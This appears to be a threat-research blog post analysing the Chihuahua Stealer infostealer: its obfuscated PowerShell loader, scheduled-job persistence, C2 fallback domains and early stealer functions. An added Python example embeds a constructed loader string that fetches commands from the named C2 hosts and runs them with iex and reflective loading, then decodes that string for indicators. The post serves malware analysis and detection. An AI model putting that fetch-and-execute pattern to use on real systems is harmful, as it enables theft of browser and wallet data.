Analysis by Lovely Antonio and Chloe de Leon
Chihuahua Stealer is a newly discovered .NET-based infostealer that blends common malware techniques with unusually advanced features. It first came to our attention through a Reddit post, where a user shared an obfuscated PowerShell script that they had been tricked into executing via a Google Drive document. If this sounds vaguely familiar, you are not wrong: we have seen similar things before, and we also wrote about this. The script uses multi-stage payloads, achieves persistence through scheduled tasks and leads to the execution of the main stealer payload. This blog article breaks down each stage of the attack chain, beginning with the initial delivery method and ending in encrypted data exfiltration.
Key Takeaways (tl;dr)
- The infection begins with an obfuscated PowerShell script shared through a malicious Google Drive document, launching a multi-stage payload chain.
- Persistence is achieved through a scheduled job that checks for custom marker files and dynamically fetches additional payloads from multiple fallback domains.
- The main payload, written in .NET, targets browser data and crypto wallet extensions.
- Stolen data is compressed into an archive with the file extension “.chihuahua” and encrypted using AES-GCM via Windows CNG APIs.
- The encrypted archive is exfiltrated over HTTPS, and all local traces are wiped afterwards to reduce the forensic footprint.
PowerShell Script Behavior
Our colleague found an interesting Reddit post from April 9 in which a user shared a PowerShell script they had been tricked into running via a Google Drive document. On closer examination, the PowerShell-based loader starts a multi-stage execution chain that uses Base64 encoding, hex-string obfuscation and scheduled jobs to establish persistence, and it retrieves additional payloads from fallback C2 domains, indicating a modular and stealth-focused design.
The initial stage is a short launcher that passes a Base64-encoded string to PowerShell’s iex (Invoke-Expression), bypassing execution policy checks and running silently. This lets the attacker keep the actual logic in an encoded payload, which delays analysis and signature-based detection.
After decoding, the second-stage script reconstructs a large, obfuscated hex payload: it strips the custom “~” delimiters, converts each hex pair into its ASCII character and dynamically assembles the third-stage script. Because the script only exists in its final form at runtime, this technique hinders static detection and complicates sandbox analysis.
The deobfuscated script creates a scheduled job named “f90g30g82” that runs every minute and repeatedly calls a logic block. This block checks the user’s Recent folder for files with the “.normaldaki” extension, which serve as infection markers. If such a file is found, it queries the C2 server cdn[.]findfakesnake[.]xyz for further instructions; if the response contains a “Comm” trigger, the payload is decoded and executed. If the primary server is unreachable, the script falls back to a second domain, cat-watches-site[.]xyz.
The final stage sets the scheduled job’s trigger and retrieves a .NET assembly from flowers[.]hold-me-finger[.]xyz, followed by another Base64-encoded payload from a OneDrive-hosted URL. This payload, the Chihuahua Stealer, is decoded and loaded directly into memory via reflection, then run by invoking its Main method. Finally, the script clears the console and wipes the contents of the clipboard.
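To make the two decoding transforms concrete, here is an added Python example (written for this page; it is not code from the original analysis or from the loader itself) that wraps a constructed stand-in for the stage-3 script the way stages 2 and 1 do, then peels it back statically and pulls out the indicator types named above, so an analyst never has to let iex run anything. The assumptions are labelled in the code: the stage-1 Base64 decodes to UTF-16LE or UTF-8 text, the stage-2 payload is two-digit hex bytes separated by “~”, and the cmdlet forms in the constructed sample (Register-ScheduledJob -Name, Get-ChildItem -Filter, a -match 'Comm' test, [Reflection.Assembly]::Load) are hypothetical, so the indicator regexes need adjusting if the real script is laid out differently.

```python
import base64
import re

# Constructed stand-in for the stage-3 script (not the real one). It carries
# only the indicator types the analysis names, in the cmdlet forms assumed by
# extract_indicators() below.
STAGE3_SAMPLE = (
    "Register-ScheduledJob -Name 'f90g30g82' -ScriptBlock {"
    "$m=Get-ChildItem ($env:APPDATA+'\\Microsoft\\Windows\\Recent') -Filter '*.normaldaki';"
    "if($m){$r=(Invoke-WebRequest 'https://cdn.findfakesnake.xyz/').Content;"
    "if(-not $r){$r=(Invoke-WebRequest 'https://cat-watches-site.xyz/').Content};"
    "if($r -match 'Comm'){iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r)))}}};"
    "[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,$null)"
)


def build_stage2(stage3: str, delim: str = "~") -> str:
    """Re-create the stage-2 wrapper: stage 3 as delimiter-separated hex bytes plus
    the runtime one-liner that strips the delimiter and rebuilds the script."""
    hexed = delim.join(f"{b:02x}" for b in stage3.encode("utf-8"))
    return (f"$h='{hexed}';iex (-join ($h -split '{delim}' | "
            "ForEach-Object {[char][Convert]::ToInt32($_,16)}))")


def build_stage1(stage2: str, encoding: str = "utf-16-le") -> str:
    """Re-create the stage-1 blob: the stage-2 script Base64-encoded. UTF-16LE is
    what PowerShell's -EncodedCommand expects; UTF-8 is the other common choice
    (assumption: the real launcher uses one of the two)."""
    return base64.b64encode(stage2.encode(encoding)).decode("ascii")


def decode_stage1(blob: str) -> str:
    """Stage 1 -> stage 2: Base64-decode and pick the text encoding that yields
    plain ASCII script. UTF-16LE decoding of UTF-8 input produces CJK characters
    and UTF-8 decoding of UTF-16LE input produces NULs, so the check is unambiguous."""
    raw = base64.b64decode(blob)
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isascii() and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    raise ValueError("stage-1 payload did not decode to ASCII script text")


def decode_stage2(stage2: str, delim: str = "~") -> str:
    """Stage 2 -> stage 3: locate the delimited hex run, drop the delimiters and
    hex-decode it ourselves instead of letting PowerShell rebuild and iex it."""
    d = re.escape(delim)
    run = re.compile(rf"(?:[0-9A-Fa-f]{{2}}{d}){{8,}}[0-9A-Fa-f]{{2}}")
    m = run.search(stage2)
    if m is None:
        raise ValueError(f"no {delim!r}-delimited hex payload found")
    return bytes.fromhex(m.group(0).replace(delim, "")).decode("utf-8")


def extract_indicators(script: str) -> dict:
    """Pull the indicator types named in the analysis out of a recovered script.
    The patterns assume the cmdlet forms used in STAGE3_SAMPLE (hypothetical)."""
    job = re.search(r"Register-ScheduledJob\s+-Name\s+'?([\w.-]+)'?", script)
    return {
        "job_name": job.group(1) if job else None,
        "domains": sorted(set(re.findall(r"https?://([a-z0-9.-]+\.[a-z]{2,})", script, re.I))),
        "marker_extensions": sorted(set(re.findall(r"-Filter\s+'\*(\.[a-z0-9]+)'", script, re.I))),
        "has_comm_trigger": bool(re.search(r"-match\s+'Comm'", script)),
        "reflective_load": "[Reflection.Assembly]::Load(" in script,
    }


def peel(blob: str, delim: str = "~") -> dict:
    """Walk the whole chain from the stage-1 blob down to stage-3 indicators."""
    stage2 = decode_stage1(blob)
    stage3 = decode_stage2(stage2, delim)
    return {"stage2": stage2, "stage3": stage3, "indicators": extract_indicators(stage3)}


if __name__ == "__main__":
    blob = build_stage1(build_stage2(STAGE3_SAMPLE))
    for key, value in peel(blob)["indicators"].items():
        print(f"{key}: {value}")
```

The point of the two decode functions is that each stage's transform is reversible without executing it: once the Base64 and the hex run are identified, the third-stage script and its domains, job name and marker extension fall out of a few lines of Python, which is also where a detection rule for the “.normaldaki” marker or the job name would start.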
Chihuahua Stealer
Initial Execution
The stealer begins execution with the DedMaxim() function, which prints transliterated Russian rap lyrics to the console with short pauses between lines. These strings serve no functional purpose, but their presence may be a cultural or personal signature: the malware author may have included them as a reference to a favourite artist or scene, much like other themed malware that embeds music, memes or personal trademarks in its payloads.
Browser and Wallet Targeting
Once the lyrics have been printed, the stealer moves on to its core logic. The PopilLina() function is where the malware sets up its internal operations. It queries the machine name and disk serial number via WMI and concatenates them into a single string, which is passed through two obfuscated helper functions that turn it into a hashed unique identifier for that machine. This ID is used to label the archive and the folder holding the stolen data.